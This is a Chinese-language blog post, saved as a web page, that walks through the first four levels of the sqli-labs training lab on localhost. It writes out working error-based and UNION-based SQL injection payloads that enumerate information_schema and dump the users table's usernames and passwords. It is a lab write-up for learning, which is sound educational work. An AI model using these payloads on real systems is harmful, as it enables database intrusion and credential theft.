<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>sqli-labs学习sql注入 | 0xMJ&#39;s blog</title>
  <meta name="keywords" content=" sqli-labs ">
  <meta name="description" content="sqli-labs学习sql注入 | 0xMJ&#39;s blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="0xMJ&#39;s blog">
<meta property="og:url" content="http://0xmj.club/404.html">
<meta property="og:site_name" content="0xMJ&#39;s blog">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-10-07T10:21:52.994Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="0xMJ&#39;s blog">


<link rel="icon" href="/img/head.jpg">

<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/hl_theme/atom-light.css">

<link href="//cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>


</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
</div>
<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/head.jpg" />
</a>
<div class="author">
    <span>0xMJ</span>
</div>
<div class="icon">
    
    <a class="rss" title="rss" href="https://www.zhihu.com/people/dai-meng-jie" target="_blank"></a>
    
    
    <a class="github" title="github" href="https://github.com/0xMJ" target="_blank"></a>
    
    
    
    
    
    <a class="instagram" title="instagram" href="https://www.instagram.com/1_be_winner/" target="_blank"></a>
    
    
    
    <a class="weibo" title="weibo" href="http://weibo.com/u/3606330100/" target="_blank"></a>
    
    
    <a class="email" title="email" href="mailto:951207194@qq.com"></a>
    
</div>
<ul>
    <li class="all active">全部文章</li>
    
    <li data-rel="思考"> 思考 </li>
    
    <li data-rel="信安"> 信安 </li>
    
    <li data-rel="博客"> 博客 </li>
    
    <li data-rel="Kali"> Kali </li>
    
    <li data-rel="读书摘要"> 读书摘要 </li>
    
</ul>
<div class="left-bottom">
    <a class="about" href="/about">关于</a><a class="friends">友链</a>
</div>
<input type="hidden" id="yelog_site_posts_number" value="14">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>
    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://ph0rse.me/">Ph0rse</a></li>
            
            <li><a target="_blank" href="http://03i0.com/">Snoopy</a></li>
            
            <li><a target="_blank" href="http://www.cnblogs.com/iamstudy/">I3m0n</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off">
        <i class="cross"></i>
        <span>
        <label for="tagswitch">Tags:</label>
        <input id="tagswitch" type="checkbox">
    </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">思考</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">first-blog</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">sqlmap</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">hexo</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">TCPDUMP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">NETCAT</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">Nikto</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">Skipfish</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">QWASP_ZAP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">Vega</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">黑客攻防web安全实战详解</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">sqli-labs</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">Dvwa</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    <nav>
        
        <a  class="思考 "
           href="/2017/11/22/17-11反思与进取/"
           data-tag="思考"
           data-author="" >
            <span class="post-title" title="17-11反思与进取">17-11反思与进取</span>
            <span class="post-date" title="2017-11-22 17:10:55">2017/11/22</span>
        </a>
        
        <a  class="思考 "
           href="/2017/09/27/Hello World /"
           data-tag="first-blog"
           data-author="" >
            <span class="post-title" title="my-first-blog">my-first-blog</span>
            <span class="post-date" title="2017-09-27 16:56:58">2017/09/27</span>
        </a>
        
        <a  class="信安 "
           href="/2017/11/21/SQLMAP注入教程-11种常见SQLMAP使用方法详解/"
           data-tag="sqlmap"
           data-author="" >
            <span class="post-title" title="SQLMAP注入教程-11种常见SQLMAP使用方法详解">SQLMAP注入教程-11种常见SQLMAP使用方法详解</span>
            <span class="post-date" title="2017-11-21 04:27:10">2017/11/21</span>
        </a>
        
        <a  class="博客 "
           href="/2017/11/22/hexo博客搭建/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="hexo博客搭建">hexo博客搭建</span>
            <span class="post-date" title="2017-11-22 16:57:45">2017/11/22</span>
        </a>
        
        <a  class=""
           href="/2017/09/25/hello-world/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Hello World">Hello World</span>
            <span class="post-date" title="2017-09-25 11:30:25">2017/09/25</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-工具-TCPDUMP/"
           data-tag="TCPDUMP"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-工具-TCPDUMP">kali渗透测试之Web渗透-工具-TCPDUMP</span>
            <span class="post-date" title="2018-02-27 19:42:43">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-工具-NETCAT/"
           data-tag="NETCAT"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-工具-NETCAT">kali渗透测试之Web渗透-工具-NETCAT</span>
            <span class="post-date" title="2018-02-27 19:38:09">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Nikto/"
           data-tag="Nikto"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Nikto">kali渗透测试之Web渗透-扫描工具-Nikto</span>
            <span class="post-date" title="2018-02-27 19:47:03">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Skipfish/"
           data-tag="Skipfish"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Skipfish">kali渗透测试之Web渗透-扫描工具-Skipfish</span>
            <span class="post-date" title="2018-02-27 19:49:37">2018/02/27</span>
        </a>
        
        <a  class=""
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-QWASP-ZAP/"
           data-tag="QWASP_ZAP"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-QWASP_ZAP">kali渗透测试之Web渗透-扫描工具-QWASP_ZAP</span>
            <span class="post-date" title="2018-02-27 19:54:20">2018/02/27</span>
        </a>
        
        <a  class="Kali "
           href="/2018/02/27/kali渗透测试之Web渗透-扫描工具-Vega/"
           data-tag="Vega"
           data-author="" >
            <span class="post-title" title="kali渗透测试之Web渗透-扫描工具-Vega">kali渗透测试之Web渗透-扫描工具-Vega</span>
            <span class="post-date" title="2018-02-27 19:51:36">2018/02/27</span>
        </a>
        
        <a  class="读书摘要 "
           href="/2018/02/27/黑客攻防web安全实战详解/"
           data-tag="黑客攻防web安全实战详解"
           data-author="" >
            <span class="post-title" title="黑客攻防web安全实战详解">黑客攻防web安全实战详解</span>
            <span class="post-date" title="2018-02-27 19:57:12">2018/02/27</span>
        </a>
        
        <a  class="信安 "
           href="/2018/02/27/sqli-labs学习sql注入/"
           data-tag="sqli-labs"
           data-author="" >
            <span class="post-title" title="sqli-labs学习sql注入">sqli-labs学习sql注入</span>
            <span class="post-date" title="2018-02-27 20:01:25">2018/02/27</span>
        </a>
        
        <a  class="信安 "
           href="/2017/11/22/DVWA笔记/"
           data-tag="Dvwa"
           data-author="" >
            <span class="post-title" title="DVWA笔记">DVWA笔记</span>
            <span class="post-date" title="2017-11-22 17:06:26">2017/11/22</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-sqli-labs学习sql注入" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">sqli-labs学习sql注入</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
            <a href="javascript:" data-rel="信安">信安</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color5">sqli-labs</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2018-02-27 20:02:28'>2018-02-27 20:01</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli-labs学习sql注入"><span class="toc-text">sqli-labs学习sql注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#简介"><span class="toc-text">简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#安装"><span class="toc-text">安装</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><span class="toc-text">Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><span class="toc-text">less 2 GET - Error based - Intiger based (基于错误的GET整型注入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><span class="toc-text">less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）"><span class="toc-text">less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="sqli-labs学习sql注入"><a href="#sqli-labs学习sql注入" class="headerlink" title="sqli-labs学习sql注入"></a>sqli-labs学习sql注入</h1><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>结构化查询语言，也叫做SQL，从根本上说是一种处理数据库的编程语言。对于初学者，数据库仅仅是在客户端和服务端进行数据存储。SQL通过结构化查询，关系，面向对象编程等等来管理数据库。编程极客们总是搞出许多这样类型的软件，像MySQL，MS SQL ,Oracle以及Postgresql。现在有一些程序能通过结构化查询来管理大型数据库。脚本小子们一定已经动手体验了类似SQL注入等这样的操作，虽然他们可能已经通过使用自动化工具例如SQL Map或者SQLNinja来实施攻击，但却还不知它真正的原理。在这篇简短的教程里，我将会尽力让你对SQL 注入是怎样工作的，攻击是怎样发生的以及什么是应用程序SQL漏洞有一个深入的理解。我们将要使用的实验室是SQLi Labs，它是一个可以从<a href="https://github.com/Audi-1/sqli-labs免费下载，以便我们研究学习以及编写安全的程序。所以这篇教程对于程序员和安全测试者都将是一次动手实践的机会。" target="_blank" rel="external">https://github.com/Audi-1/sqli-labs免费下载，以便我们研究学习以及编写安全的程序。所以这篇教程对于程序员和安全测试者都将是一次动手实践的机会。</a></p>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>从<a href="https://github.com/Audi-1/sqli-labs下载源代码，将源代码复制到Apache" target="_blank" rel="external">https://github.com/Audi-1/sqli-labs下载源代码，将源代码复制到Apache</a> webroot 文件夹（htddocs，/var/www） 打开sql-connections文件夹下的“db-creds.inc”文件修改mysql用户名和密码为你自己的打开浏览器，通过localhost的index.html访问文件夹 点击setup/resetDB 链接在你的mysql中创造数据库<br>   开始游戏！</p>
<h3 id="Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><a href="#Less-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入" class="headerlink" title="Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)"></a>Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</h3><p>第一关就碰壁，原因是服务器端开启的magic_quotes_gpc，会把’转义成\’，在php.ini中将magic_quotes_gpc设置成Off再重启web服务即可。<br>使用火狐浏览器的hackbar插件对url进行修改，首先输入id=1，页面返回正常，<br><a href="http://localhost:9096/sqli-labs-master/Less-1/?id=1" target="_blank" rel="external">http://localhost:9096/sqli-labs-master/Less-1/?id=1</a><br>如图：<br><img src="http://oy0tigw51.bkt.clouddn.com/201711041551_81.png" alt=""><br>通过观察发现，可以遍历id的值来获取用户名和密码<br>可以猜测后台查询语句：<br>select uername,password from talble where id = input（输入的1,2,3。。。）<br>数据库中选取当id等于input的时候，呈现出用户名和密码<br>报错类型<br><img src="http://oy0tigw51.bkt.clouddn.com/201711041551_726.png" alt=""><br>在url框里？id = n后面添加 and 1=1 ，发现返回正常<br> and 1=2 返回也正常</p>
<p>显然，初步猜测的sql语句错误，因为 1=1和 1=2的返回应该不同<br>此时用 ‘和\测试会报语法错误：</p>
<p>  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1\’ LIMIT 0,1’ at line 1 </p>
<p>对出错信息分析：<br>near ‘’1\’ LIMIT 0,1’ at line 1 </p>
<p>最外层的单引号是标识错误的，将其隔离</p>
<pre><code>near &#39;         &#39;   1\   &#39; LIMIT 0,1              &#39; at line 1
</code></pre><p>1\是我们的参数输入的值，那么1\外的两个单引号是哪里来的呢。很有可能就是原来SQL查询语句中自带的单引号，所以我们对SQL语句进行猜想。<br>对之前猜测的语句进行修改，添加加上后面爆出错误的 ‘1\’中的单引号：</p>
<pre><code>select uername,password from talble where id = &#39;input&#39;
-----&gt;
select uername,password from talble where id = &#39;input 攻击代码&#39;
</code></pre><p>————————–方法①：  <strong>引号闭合</strong>—————————–</p>
<p>构造语句：</p>
<p>id = 1 ‘ and ‘1’=’1(填入的是’ and ‘1’=’1)</p>
<p>这是将程序中的单引号闭合起来，至少不会出现语法错误<br>将其放入sql语句中看看，是否和想的一样：(替代input参数）</p>
<p>select uername,password from talble where id = ‘1   ‘ and ‘1’=’1   ‘</p>
<p>这里可以看出所有的单引号都已经闭合了，至少不会出现语法错误<br>将这种 ‘ and ‘1’=’1 带入原始url中，发现返回页面正常<br>而 ‘ and ‘1’=’2 带入原始url中，发现返回页面不正常<br>这说明该页面有注入点</p>
<p>————————方法②：  <strong>注释</strong>———————————–</p>
<p>sql中的注释符    – （不是只有–，后面还有一个空格）</p>
<p>id = 1’ and 1=1 –+<br>这里使用+替换空格，–后面必须要跟一个空格才起到注释作用<br>利用注释，可以屏蔽掉那些干扰注入语句的代码，– 后面的语句全被当成注释而不被执行</p>
<p>现在讲 ‘ and 1=1 –+ 替换 input 值</p>
<p>select uername,password from talble where id = ‘1   ‘ and 1=1 –+’</p>
<p>发现 单引号已经闭合，而– 后面的单引号和其他内容都已经被注释。只要保证前面的单引号是正确的，就能达到测试的效果，‘1’的位置，单引号成对出现，and 1=1也是正确的。</p>
<p>注释符：–+或#（# = %23）<br>用order by判断字段数<br><img src="http://oy0tigw51.bkt.clouddn.com/201710302330_441.png" alt=""><br><img src="http://oy0tigw51.bkt.clouddn.com/201710302332_642.png" alt=""><br>页面返回正常，说明有3个字段。</p>
<p>用union select联合查询看一看爆出信息的位置判断显示位(2,3处为显示位)</p>
<pre><code>playload：
http://localhost:9096/sqli-labs-master/Less-1/
?id=1&#39; union select 1,2,3%23
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710302335_829.png" alt=""><br>页面的返回值和我预想的不同，预想中页面应该返回1,2,3才对，但是实际也难还是返回Dumb,说明我们构建的SQL语句有问题！！！！啊，原来页面只能返回一行的数据，当我假设id=1时，id=1的数据就占了这一行，这样语句后面的union select联合查询就不显示在页面上了，原来问题出在这里。既然如此，我让id的值没有数据即可，这里我选择让id=-1(0也可以，只要id没有这个值就行)</p>
<pre><code>playload：
http://localhost:9096/sqli-labs-master/Less-1/?id=-1&#39; union select 1,2,3--+
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710302341_734.png" alt=""><br>爆数据库名(将显示位替换成mysql函数)</p>
<pre><code>http://localhost:9096/sqli-labs-master/Less-1/?id=-1&#39; union select null,user(),database()%23
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710310045_227.png" alt=""></p>
<blockquote>
<p>另一种查询方法<br>通过页面的返回我们可以看到只有第2列和第3列的结果显示在网页上，所以我们就只能用2,3这个位置了，但是两个位置应该是不够用的，这时我们就用到数据库的连接函数了，常用的就concat和concat_ws,还会用到group__concat(可以把查询出来的多行连接起来)，其中concat_ws的第一个参数是连接字符串的分隔符。<br>所以可以构造查询语句<br>?id=-1’ union select null,2,concat_ws(char(32,58,32),user(),database(),version())%23<br><img src="http://oy0tigw51.bkt.clouddn.com/201711041552_913.png" alt=""></p>
</blockquote>
<p>首先说一下mysql的数据库information_schema，他是系统数据库，安装完就有，记录是当前数据库的数据库，表，列，用户权限等信息，下面说一下常用的几个表<br>SCHEMATA表:储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等，show databases的结果取之此表。<br>TABLES表:储存mysql中的表信息，（当然也有数据库名这一列，这样才能找到哪个数据库有哪些表嘛）包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等。show tables from schemaname的结果取之此表<br>COLUMNS表：提供了表中的列信息，（当然也有数据库名和表名称这两列）详细表述了某张表的所有列以及每个列的信息，包括该列是那个表中的第几列，列的数据类型，列的编码类型，列的权限，猎德注释等。是show columns from schemaname.tablename的结果取之此表。 </p>
<p>知道了他的数据库名称，我们就要查询数据库下的表和字段，这时我们就要借助数据库中的元数据库构造SQL语句<a href="http://blog.csdn.net/linyt/article/details/52966555" target="_blank" rel="external">元数据库</a></p>
<p>爆表名(数据库security下的所有表名)<br>方法一：</p>
<pre><code>playload：
http://localhost:9096/sqli-labs-master/Less-1/?id=-1&#39; union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where table_schema=&#39;security&#39;%23
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201711041552_36.png" alt=""><br>这样我们就到了所有的表名和字段名，可以看出有用的表名只有id,username和password他们都在users库中，我们选取id和password进行查询，同样适用group_concat()<br>方法二：</p>
<pre><code>http://localhost:9096/sqli-labs-master/Less-1/
?id=-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;%23
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201711041552_648.png" alt=""></p>
<p>爆列名(表users下的所有列名)<br><code>http://localhost:9096/sqli-labs-master/Less-1/?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;%23</code><br><img src="http://oy0tigw51.bkt.clouddn.com/201711041553_23.png" alt=""><br><img src="http://oy0tigw51.bkt.clouddn.com/201711041553_646.png" alt=""></p>
<p>爆出字段值(security.users下所有的账号密码)</p>
<p><code>http://localhost:9096/sqli-labs-master/Less-1/?id=-1&#39; union select 1,version(),group_concat(username,&#39;:&#39;,password) from security.users%23</code><br><img src="http://oy0tigw51.bkt.clouddn.com/201711041553_546.png" alt=""><br><img src="http://oy0tigw51.bkt.clouddn.com/201711041553_347.png" alt=""></p>
<h3 id="less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><a href="#less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入" class="headerlink" title="less 2 GET - Error based - Intiger based (基于错误的GET整型注入)"></a>less 2 GET - Error based - Intiger based (基于错误的GET整型注入)</h3><p>报错信息如下<br><img src="http://oy0tigw51.bkt.clouddn.com/201710311025_436.png" alt=""><br>初步猜测sql语句为：<br>select username，password from table where id = input（输入的值）<br>直接添加 and 1=1和 and 1=2，返回页面不同，说明语句应该正确<br>再次在 id = 1后面添加’: 报语法错误<br> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1<br>错误分析：<br>near ‘’ LIMIT 0,1’ at line 1<br>先分离最外层单引号：<br>near ‘     ‘ LIMIT 0,1     ‘ at line 1<br>中间的单引号是手动输入的，说明出错在这里，也就证实了sql语句：<br>select username,password from table where id = input<br>可以看到报错信息是’ LIMIT 0,1说明后台语句可能查询语句为SELECT * FROM users WHERE id=$id LIMIT 0,1，对用户的输入没有经过任何处理，直接带入数据库查询。<br>所以payload如下<br>爆表名</p>
<pre><code>?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311028_356.png" alt=""><br>爆列名</p>
<pre><code>http://localhost:9096/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;%23
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311033_702.png" alt=""><br>爆数据</p>
<pre><code>http://localhost:9096/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(username,&#39;:&#39;,password) from security.users
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311034_397.png" alt=""></p>
<h3 id="less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><a href="#less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入" class="headerlink" title="less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)"></a>less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</h3><p><a href="http://localhost:9096/sqli-labs-master/Less-3/?id=1\" target="_blank" rel="external">http://localhost:9096/sqli-labs-master/Less-3/?id=1\</a><br>报出语法错误：<br> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1\’) LIMIT 0,1’ at line 1<br>错误分析：<br>near ‘’1\’) LIMIT 0,1’ at line 1<br>现将外层单引号去掉<br>near ‘              ‘  1\  ‘) LIMIT 0,1           ‘ at line 1<br> 1\ 是手动输入的内容，说明sql语句中还有 (‘’)的内容 ( 注：本来是只有’’)的，但是括号应该也是成对出现的，就变成了(‘’) )<br>所以修改sql语句：<br>select username，password from table where id = (‘input’)<br>爆表名：</p>
<pre><code>  payload：http://localhost:9096/sqli-labs-master/Less-3/?id=-1&#39;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;--+
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311322_158.png" alt=""><br>爆列名、爆数据类似</p>
<h3 id="less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）"><a href="#less-4-GET-Error-based-Double-Quotes-String-（基于错误的GET双引号字符型注入）" class="headerlink" title="less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）"></a>less 4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）</h3><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311327_507.png" alt=""><br>错误分析：<br>near ‘“3\”) LIMIT 0,1’ at line 1<br>先分离最外层的单引号，那是用来标识错误信息的<br>near ‘           “  3\  “) LIMIT 0,1             ‘ at line 1<br>其中 3\ 是手动输入的，还剩下””)<br>说明sql语句中应该有 (“”)   （ 括号也配对）<br>再次猜测sql语句：</p>
<pre><code>select * username,password from table where id = (&quot;input&quot;)
</code></pre><p>爆表名</p>
<pre><code>http://localhost:9096/sqli-labs-master/Less-4/?id=-1&quot;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&quot;security&quot;--+
</code></pre><p><img src="http://oy0tigw51.bkt.clouddn.com/201710311329_194.png" alt=""><br>爆列名、爆数据类似</p>

      
       <hr><span style="font-style: italic;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 951207194@qq.com </span>
    </div>
</article>


<p>
    <a href="javascript:void(0)" class="dashang" onclick="dashangToggle()">赏</a>
</p>



    



    

    </div>
    <div class="copyright">
        <p class="footer-entry">©2017 0xMJ</p>
<p class="footer-entry">Buit with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>
<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">支付宝</label></span><span><label><input type="radio" name="pay" value="weixin">微信</label></span>
    </div>
</div>
</body>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>
<script src="/js/script.js"></script>
<script>
    /*作者、标签的自动补全*/
    $(function () {
        $('.search').AutoComplete({
            'data': ['#思考','#first-blog','#sqlmap','#hexo','#TCPDUMP','#NETCAT','#Nikto','#Skipfish','#QWASP_ZAP','#Vega','#黑客攻防web安全实战详解','#sqli-labs','#Dvwa',],
            'itemHeight': 20,
            'width': 418
        }).AutoComplete('show');
    })
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $(".post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().split('\n').length - 1;
            var $numbering = $('<ul/>').addClass('pre-numbering').attr("unselectable","on");
            $(this).addClass('has-numbering')
                    .parent()
                    .append($numbering);
            for(i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    
</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 2px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    .pre-numbering{
        margin: 0px;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 0.5em 3px 0.7em 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
</style>

<!--自定义样式设置-->
<style>
    
    .nav-right nav a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    .post .pjax article .article-entry>ol, .post .pjax article .article-entry>ul, .post .pjax article>ol, .post .pjax article>ul{
        border: #e2dede solid 2px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    .post .pjax article .article-entry li>ol, .post .pjax article .article-entry li>ul,.post .pjax article li>ol, .post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    .post .pjax article .article-entry>ol>li, .post .pjax article .article-entry>ul>li,.post .pjax article>ol>li, .post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    .post .pjax article .article-entry li>ol>li, .post .pjax article .article-entry li>ul>li,.post .pjax article li>ol>li, .post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

